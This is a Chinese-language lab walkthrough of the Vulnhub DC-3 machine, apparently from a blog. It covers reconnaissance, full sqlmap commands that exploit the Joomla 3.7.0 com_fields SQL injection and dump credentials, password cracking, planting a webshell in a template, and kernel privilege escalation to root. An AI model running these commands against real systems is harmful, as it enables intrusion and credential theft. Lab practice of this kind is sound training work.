【Vulhub靶场】 DC-3

DC-3靶场下载地址:************https://download.vulnhub.com/dc/DC-3-2.zip​​​​​​​​​​​****************

目标

本机IP:192.168.118.128

靶机IP:192.168.118.0/24

信息收集

nmap扫描存活主机,扫描端口,扫描服务

nmap -sP 192.168.118.0/24

nmap -p- 192.168.118.140

nmap -sV -A 192.168.118.140

第一步首先得出目ip为192.168.118.140

然后发现只开启一个80端口

访问web页面:http://192.168.118.140,发现一个登录页面

上面信息提示我们只有一个flag,很明显这次目标最终的获取root权限

除此之外,尝试这个登录页面,并没有什么卵用,也在没有了其他信息

web信息收集,使用whatweb工具查找web信息

bash 复制代码
whatweb http://192.168.118.140

得出了一个CMS信息:Joomla

表面信息无从下手之后,我们用dirsearch扫一下目录看看。

bash 复制代码
dirsearch -u http://192.168.118.140

经过测试发现了两个重要的目录,/administrator/ 和 /README.txt

分别进去查看一下

http://192.168.118.140/administrator/,发现是一个后台登录页面

http://192.168.118.140/README.txt,找到里面有重要信息, CMS版本信息为Joomla 3.7

查询漏洞

bash 复制代码
searchsploit joomla 3.7.0

发现SQL注入漏洞,进去查看一下漏洞信息

bash 复制代码
searchsploit -x php/webapps/42033.txt

发现是一个CVE漏洞, 后面也给出了利用方法

sqlmap

跑数据库

bash 复制代码
sqlmap -u "http://192.168.118.140/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

选joomladb,跑表名

bash 复制代码
sqlmap -u "http://192.168.118.140/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D 'joomladb' --tables -p list[fullordering]

选 #__users,跑列名

bash 复制代码
sqlmap -u "http://192.168.118.140/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D 'joomladb' -T '#_users' --columns -p list[fullordering]

跑出账号密码

bash 复制代码
sqlmap -u "http://192.168.118.140/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -T '#__users' -C username,password --dump -p list[fullordering]

得到了用户名和密码,发现密码是一串密文

将密文保存到文件中,使用john工具解密一下,得到了密码snoopy

bash 复制代码
john pass.txt

使用得到的账号密码(admin :snoopy)登录刚开始探测出的后台页面

登录进去寻找,在这里会看到可以让我们上传文件的地方,但这里我们可以看到他的文件是可以修改的,那我们直接随便访问一个php文件,这里我们打开error.php

上传webshell

发现这里可以写入文件后,尝试文件上传

将 error.php 文件内容修改为我们的一句话木马

根据模块提示,我们猜测路径为 /templates/beez3/error.php

使用蚁剑连接

whoami,发现此时是一个普通权限

提权

终于是又一次成功的拿到了shell,接下来就还是最开始的问题,开始进行提权。

首先查看一下版本信息,得到版本信息为 Ubuntu 16.04,Linux version 4.4.0-21

bash 复制代码
cat /proc/version
cat /etc/issue

直接查找一下漏洞

bash 复制代码
searchsploit Ubuntu 16.04

发现这里有好多,大多数都是和提权相关的,结合前面查询到的版本信息,我们寻找4.4版本的,还是有很多可以利用的

使用 -x 去查看相关漏洞的详细信息查询(可以都去尝试一下有用的,这里就直接使用39772.txt了)

bash 复制代码
searchsploit -x linux/local/39772.txt

里面给出了使用方法和exp链接

先根据提示下载攻击压缩包,下载好之后直接使用蚁剑上传到 DC-3 靶机里面

解压文件,进入39772目录,结合前面漏洞描述给出的方法,运行漏洞脚本

成功获得root权限

最后在root的home目录下找到flag

相关推荐
茶颜悦色vv4 小时前
网络搜索引擎Shodan(2)
网络·安全·web安全·搜索引擎·网络安全
独行soc5 小时前
#渗透测试#红蓝对抗#Src漏洞挖掘 介绍-Yakit(3)
测试工具·web安全·网络安全·yakit·护网
速盾cdn6 小时前
速盾:什么是高防CDN?高防CDN的用处有哪些?
运维·服务器·网络·web安全
y0ungsheep7 小时前
[GXYCTF 2019]Ping Ping Ping 题解(多种解题方式)
linux·web安全·网络安全·php
星海幻影7 小时前
网络安全知识见闻终章 ?
网络·安全·web安全
xzajyjs8 小时前
CodeQL学习笔记(3)-QL语法(模块、变量、表达式、公式和注解)
web安全·渗透测试·漏洞分析·代码审计·codeql
星海幻影9 小时前
安全见闻-web安全
安全·web安全
尘佑不尘10 小时前
shodan5,参数使用,批量查找Mongodb未授权登录,jenkins批量挖掘
数据库·笔记·mongodb·web安全·jenkins·1024程序员节